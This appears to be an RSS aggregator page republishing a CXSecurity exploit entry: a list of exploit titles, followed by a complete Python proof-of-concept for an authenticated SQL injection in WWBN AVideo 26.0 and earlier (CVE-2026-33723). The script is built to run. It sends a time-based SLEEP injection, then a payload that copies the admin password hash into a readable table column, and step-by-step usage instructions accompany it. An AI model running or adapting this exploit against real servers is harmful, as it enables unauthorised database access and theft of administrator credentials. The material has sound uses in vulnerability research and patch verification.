惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

D
Docker
IT之家
IT之家
Microsoft Security Blog
Microsoft Security Blog
博客园 - 司徒正美
云风的 BLOG
云风的 BLOG
P
Proofpoint News Feed
D
DataBreaches.Net
B
Blog RSS Feed
博客园_首页
The GitHub Blog
The GitHub Blog
I
InfoQ
L
LangChain Blog
G
Google Developers Blog
M
MIT News - Artificial intelligence
美团技术团队
腾讯CDC
V
Visual Studio Blog
aimingoo的专栏
aimingoo的专栏
博客园 - 聂微东
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Apple Machine Learning Research
Apple Machine Learning Research
A
About on SuperTechFans
博客园 - 三生石上(FineUI控件)
博客园 - 叶小钗

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
WWBN AVideo <= 26.0 - Authenticated SQL Injection
2026-03-26 · via CXSECURITY Database RSS Feed - CXSecurity.com

Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection CVE: CVE-2026-33723 Date: 2026-03-25 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamer_security Author GitHub: https://github.com/mbanyamer Author Blog: https://banyamersecurity.com/blog/ Vendor Homepage: https://github.com/WWBN/AVideo Software Link: https://github.com/WWBN/AVideo Affected: AVideo <= 26.0 Tested on: AVideo 26.0 Category: Web Application Platform: Linux / Windows Exploit Type: SQL Injection CVSS: 7.1 HIGH Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data. Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c Notes: • Requires valid PHPSESSID from any logged-in user (regular user is enough) • Injects data into the subscribes.email column How to Use Step 1: Login to AVideo with any user account and copy the PHPSESSID cookie value Step 2: Edit TARGET and PHPSESSID variables in the exploit script, then run it === Full Python Exploit === #!/usr/bin/env python3 # Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection # CVE: CVE-2026-33723 # Date: 2026-03-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://github.com/WWBN/AVideo # Software Link: https://github.com/WWBN/AVideo # Affected: AVideo <= 26.0 # Tested on: AVideo 26.0 # Category: Web Application # Platform: Linux / Windows # Exploit Type: SQL Injection # CVSS: 7.1 # Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data. # Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c # Usage: # python3 exploit.py def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import requests import sys import time TARGET = "https://target.com" PHPSESSID = "YOUR_VALID_PHPSESSID_HERE" HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded", } COOKIES = {"PHPSESSID": PHPSESSID} def send_payload(payload, endpoint="/objects/subscribe.json.php"): data = {"user_id": payload} url = TARGET.rstrip("/") + endpoint try: r = requests.post(url, data=data, cookies=COOKIES, headers=HEADERS, timeout=15) return r except Exception as e: print(f"[-] Error: {e}") return None def main(): banner() if not PHPSESSID or PHPSESSID == "YOUR_VALID_PHPSESSID_HERE": print("[-] Please edit the script and set your valid PHPSESSID!") sys.exit(1) print(f"[*] Target : {TARGET}") print(f"[*] Session : {PHPSESSID[:15]}...\n") print("[+] Testing Time-Based SQL Injection...") start = time.time() send_payload("99999'+AND+SLEEP(5)+AND+'1") elapsed = time.time() - start print(f" Response time: {elapsed:.2f} seconds") if elapsed >= 4.5: print(" [+] Vulnerable! Time-based SQLi confirmed.") else: print(" [-] Not vulnerable or blocked.") print("\n" + "="*70) print("[+] Extracting Admin Password Hash...") extract_payload = "99999',(SELECT pass FROM users WHERE isAdmin=1 LIMIT 1),'a','1.1.1.1',now(),now(),'1'); -- -" send_payload(extract_payload) print(" [+] Payload sent successfully!") print(" [+] Admin password hash has been injected into the 'subscribes' table (email column).") print(" [+] Check your subscriptions or database to retrieve the hash.") print("\n[+] Exploit finished. Use responsibly!") if __name__ == "__main__": main()

References:

https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h

https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c



Vote for this issue:

100%

0%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.